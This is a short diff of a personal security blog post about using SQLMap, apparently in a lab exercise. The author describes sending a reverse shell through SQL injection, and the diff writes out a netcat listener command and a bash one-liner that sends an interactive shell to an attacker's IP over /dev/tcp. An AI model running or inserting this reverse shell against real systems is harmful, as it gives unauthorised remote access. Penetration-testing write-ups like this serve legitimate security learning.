etcpwd13/greyfriar_blog/_posts/2021-01-02-Tool-SQLMap.md

 whoami

-in the example I passes in a net cat shell back to another terminal I had running a nc listener 'nc -nlvp 4321' 'bash -c 'bash -i >& /dev/tcp/10.10.14.87/4321 0>&1'
+in the example I passes in a net cat shell back to another terminal I had running a nc listener 'nc -nlvp 4321'

+'bash -c 'bash -i >& /dev/tcp/10.10.14.87/4321 0>&1'

-Note the session was not stable but I was able to keep it open long enough to open another connection not bases on sqli
+Note: the session was not stable but I was able to keep it open long enough to open another connection not bases on sqli

 [SQLMap Cheat Sheet :][upgrade-term]